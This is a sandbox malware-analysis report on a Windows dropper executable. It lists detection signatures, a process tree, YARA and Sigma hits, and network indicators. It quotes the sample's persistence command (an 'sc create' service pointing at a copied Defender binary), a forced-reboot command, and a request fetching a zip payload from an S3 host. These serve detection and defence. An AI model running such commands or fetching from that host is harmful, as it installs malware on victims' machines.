Edit tour

Windows Analysis Report
0923840932020004-3-0.exe

Overview

General Information

Sample name:	0923840932020004-3-0.exe
Analysis ID:	1393492
MD5:	baadaedc15fe5ed8aafb3c74cf4f2f3c
SHA1:	3d8495202660c61d4ea7d6b9e6d3512987b304f4
SHA256:	cad643944905d6bdde925f12412ae8141bf36c62be073243a2d989250b6a8beb
Tags:	exe
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Contain functionality to detect virtual machines

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Machine Learning detection for dropped file

Sample uses string decryption to hide its real strings

Uses shutdown.exe to shutdown or reboot the system

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains capabilities to detect virtual machines

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain checking for process token information

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

PE file does not import any functions

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Tries to load missing DLLs

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

0923840932020004-3-0.exe (PID: 5536 cmdline: C:\Users\user\Desktop\0923840932020004-3-0.exe MD5: BAADAEDC15FE5ED8AAFB3C74CF4F2F3C)

0923840932020004-3-0.exe (PID: 4952 cmdline: "C:\Users\user\Desktop\0923840932020004-3-0.exe" --rerunningWithoutUAC MD5: BAADAEDC15FE5ED8AAFB3C74CF4F2F3C)

Update.exe (PID: 4432 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)

vmware-authd.exe (PID: 5456 cmdline: "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" --squirrel-firstrun MD5: 436CEDFA08F245AD52DD221BEC4480A4)

conhost.exe (PID: 4080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

vmware-authd.exe (PID: 7208 cmdline: "C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe" MD5: 436CEDFA08F245AD52DD221BEC4480A4)

conhost.exe (PID: 7216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7312 cmdline: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

sc.exe (PID: 7364 cmdline: sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)

cmd.exe (PID: 7444 cmdline: "C:\Windows\System32\cmd.exe" /C shutdown.exe -r -t 1 -f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

shutdown.exe (PID: 7504 cmdline: shutdown.exe -r -t 1 -f MD5: FCDE5AF99B82AE6137FB90C7571D40C3)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\DefMeta\Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
3.0.Update.exe.a40000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

System Summary

Sigma detected: New Service Creation Using Sc.EXE

Source: Process started

Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto, CommandLine: sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\sc.exe, NewProcessName: C:\Windows\SysWOW64\sc.exe, OriginalFileName: C:\Windows\SysWOW64\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7312, ParentProcessName: cmd.exe, ProcessCommandLine: sc create WdCmdSvc binPath= "C:\\Program Files (x86)\\Microsoft.NET\\MpCmdRun.exe" start= auto, ProcessId: 7364, ProcessName: sc.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll

Virustotal: Detection: 11%

Perma Link

Multi AV Scanner detection for submitted file

Source: 0923840932020004-3-0.exe

Virustotal: Detection: 9%

Perma Link

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\Microsoft.NET\MpClient.dll

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: {KXWDAD
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: =, 6,'?7[IY xo
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: g56;}[[>
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: gC2NA
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: Fhf~mj
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: :J5]$\
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: %5<)=&%1%*:j+&8 h71> 5(
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: (=490K~9.ZV
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: ;)2]p^
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: #<57;HI,"i!N $
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: @+1
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: ^KEZBO\
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: P_QJENJmAC_GE_
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: 2(/,2?<*+&6
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: {^47OE
Source: 3.0.Update.exe.a40000.0.unpack	String decryptor: q6 &W_"?&zY/)5_H&

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D8E20 CryptGenRandom,	4_2_6E0D8E20
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D8F10 Sleep,CryptGenRandom,CryptReleaseContext,	4_2_6E0D8F10
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D8DE0 CryptReleaseContext,	4_2_6E0D8DE0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D8A50 CryptAcquireContextA,GetLastError,CryptReleaseContext,	4_2_6E0D8A50
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E0D88F0 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,	4_2_6E0D88F0
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E119500 CryptReleaseContext,	4_2_6E119500

Source: 0923840932020004-3-0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DefMeta

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

File created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.log

Jump to behavior

Source: unknown

HTTPS traffic detected: 3.5.232.185:443 -> 192.168.2.5:49705 version: TLS 1.2

Source: 0923840932020004-3-0.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000003.00000002.2062592570.000000000308A000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, vmware-authd.exe, 00000004.00000002.3264350759.000000006E3B1000.00000020.00000001.01000000.00000009.sdmp, vmware-authd.exe, 00000008.00000002.3264638959.000000006E3B1000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.3.dr
Source:	Binary string: MpSvc.pdbGCTL source: MpSvc.dll.8.dr
Source:	Binary string: OfflineScannerShell.pdb source: OfflineScannerShell.exe.8.dr
Source:	Binary string: NisSrv.pdb source: NisSrv.exe.8.dr
Source:	Binary string: MpAzSubmit.pdb source: MpAzSubmit.dll.8.dr
Source:	Binary string: MpCmdRun.pdbGCTL source: MpCmdRun.exe0.8.dr, MpCmdRun.exe.8.dr
Source:	Binary string: netstandard.pdb.mdb source: Update.exe
Source:	Binary string: MpRTP.pdb source: MpRtp.dll.8.dr
Source:	Binary string: MpRTP.pdbGCTL source: MpRtp.dll.8.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdb source: MpDetoursCopyAccelerator.dll.8.dr
Source:	Binary string: endpointdlp.pdb source: endpointdlp.dll.8.dr
Source:	Binary string: DefenderCSP.pdb source: vmware-authd.exe, 00000008.00000003.2107824020.0000000005831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: MpCmdRun.pdb source: MpCmdRun.exe0.8.dr, MpCmdRun.exe.8.dr
Source:	Binary string: MpCopyAccelerator.pdbGCTL source: MpCopyAccelerator.exe.8.dr
Source:	Binary string: shellext.pdb source: shellext.dll.8.dr
Source:	Binary string: endpointdlp.pdbGCTL source: endpointdlp.dll.8.dr
Source:	Binary string: MpDlpCmd.pdbGCTL source: MpDlpCmd.exe.8.dr
Source:	Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000004.00000000.2041997079.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000000.2055780401.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000002.3262746812.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe.3.dr
Source:	Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 0923840932020004-3-0.exe
Source:	Binary string: MsMpCom.pdb source: MsMpCom.dll.8.dr
Source:	Binary string: MpDetours.pdb source: MpDetours.dll.8.dr
Source:	Binary string: MpAzSubmit.pdbGCTL source: MpAzSubmit.dll.8.dr
Source:	Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\Novas DLLs\Dll2\Release\PanelMain.pdba source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr
Source:	Binary string: MpDetours.pdbGCTL source: MpDetours.dll.8.dr
Source:	Binary string: ProtectionManagement.pdbGCTL source: ProtectionManagement.dll.8.dr
Source:	Binary string: MpCommu.pdb source: MpCommu.dll.8.dr
Source:	Binary string: MpCommu.pdbGCTL source: MpCommu.dll.8.dr
Source:	Binary string: MpDetoursCopyAccelerator.pdbGCTL source: MpDetoursCopyAccelerator.dll.8.dr
Source:	Binary string: shellext.pdbOGPS source: shellext.dll.8.dr
Source:	Binary string: ProtectionManagement.pdb source: ProtectionManagement.dll.8.dr
Source:	Binary string: NisSrv.pdbGCTL source: NisSrv.exe.8.dr
Source:	Binary string: MpDlpCmd.pdb source: MpDlpCmd.exe.8.dr
Source:	Binary string: MpCopyAccelerator.pdb source: MpCopyAccelerator.exe.8.dr
Source:	Binary string: OfflineScannerShell.pdbOGPS source: OfflineScannerShell.exe.8.dr
Source:	Binary string: DefenderCSP.pdbGCTL source: vmware-authd.exe, 00000008.00000003.2107824020.0000000005831000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\Novas DLLs\Dll2\Release\PanelMain.pdb source: vmware-authd.exe, 00000004.00000002.3264020181.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmware-authd.exe, 00000008.00000002.3264472244.000000006E11A000.00000002.00000001.01000000.0000000A.sdmp, vmwarebase.dll.3.dr
Source:	Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe, 00000004.00000002.3262907385.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000004.00000000.2041997079.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000000.2055780401.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe, 00000008.00000002.3262746812.000000000048A000.00000002.00000001.01000000.00000008.sdmp, vmware-authd.exe.3.dr
Source:	Binary string: MpSvc.pdb source: MpSvc.dll.8.dr
Source:	Binary string: MsMpCom.pdbGCTL source: MsMpCom.dll.8.dr

Source: C:\Users\user\Desktop\0923840932020004-3-0.exe	Code function: 0_2_00FA5564 FindFirstFileExW,		0_2_00FA5564
Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe	Code function: 4_2_6E10E976 FindFirstFileExW,		4_2_6E10E976

Networking

Yara detected Generic Downloader

Source: Yara match	File source: Update.exe, type: SAMPLE
Source: Yara match	File source: 3.0.Update.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\DefMeta\Update.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: global traffic

HTTP traffic detected: GET /beginTc.zip HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: special-edition32093201.s3.sa-east-1.amazonaws.comConnection: Keep-Alive

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\AppData\Local\DefMeta\app-1.0.0\vmware-authd.exe

Code function: 4_2_6E0C5840 URLDownloadToFileW,Sleep,Sleep,Sleep,ShellExecuteW,Sleep,ShellExecuteW,

4_2_6E0C5840

Source: global traffic

Source: unknown

DNS traffic detected: queries for: special-edition32093201.s3.sa-east-1.amazonaws.com

Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: NisSrv.exe.8.dr	String found in binary or memory: http://canonicalizer.ucsuri.tcs/68007400740070003a002f002f00https://bad
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003285000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003172000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/DefMeta.nuspec
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/_rels/.rels
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/vcruntime140.dll
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/vmware-authd.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/lib/net48/vmwarebase.dll
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003285000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.0000000003172000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/package/services/metadata/core-properties/f2fc7b50a1cb43c08c289558008b7a8a.p
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.bsdiff
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.diff
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.dll
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.exe
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.nuspec
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.psmdcp
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.rels
Source: Update.exe, 00000003.00000002.2062592570.0000000003151000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://defaultcontainer/tempfiles/sample.shasum
Source: MpCommu.dll.8.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest
Source: MpCommu.dll.8.dr	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0L
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Update.exe, 00000003.00000002.2062592570.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000003.00000002.2062592570.00000000030AC000.00000004.00000800.00020000.00000000.sdmp, vmware-authd.exe.3.dr	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Update.exe, 00000003.00000002.2062592570.000000000326D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.openxmlformats.or
Source: MpCommu.dll.8.dr	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
